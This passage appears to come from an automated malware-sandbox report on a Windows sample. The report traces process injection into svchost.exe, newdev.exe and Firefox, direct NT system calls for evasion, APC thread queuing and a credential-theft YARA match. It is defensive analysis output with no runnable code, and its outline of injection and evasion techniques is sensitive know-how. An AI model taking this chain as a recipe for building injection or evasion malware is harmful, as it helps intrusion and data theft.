            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]2_2_03CDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]2_2_03CBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]2_2_03C6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]2_2_03C5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]2_2_03C6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]2_2_03CC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]2_2_03C649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03CFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03CBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]2_2_03CB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]2_2_03CBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]2_2_03CBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]2_2_03CB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]2_2_03CC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03C5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03CFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]2_2_03C30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]2_2_03CBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]2_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]2_2_03C60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]2_2_03CC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]2_2_03CC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC810 mov eax, dword ptr fs:[00000030h]2_2_03CBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov ecx, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A830 mov eax, dword ptr fs:[00000030h]2_2_03C6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]2_2_03CD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]2_2_03CD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03C2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03C2EFD8
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00FD80A9
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FAA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FAA155
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FAA124 SetUnhandledExceptionFilter,0_2_00FAA124

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\newdev.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeThread register set: target process: 3620Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeThread APC queued: target process: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3189008Jump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD87B1 LogonUserW,0_2_00FD87B1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F83B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B3A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F848D7
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE4C7F mouse_event,0_2_00FE4C7F
            Source: C:\Users\user\Desktop\psibx9rXra.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"Jump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FD7CAF
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FD874B
            Source: psibx9rXra.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: psibx9rXra.exe, GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA862B cpuid 0_2_00FA862B
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB4E87
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FC1E06 GetUserNameW,0_2_00FC1E06
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FB3F3A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F849A0

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
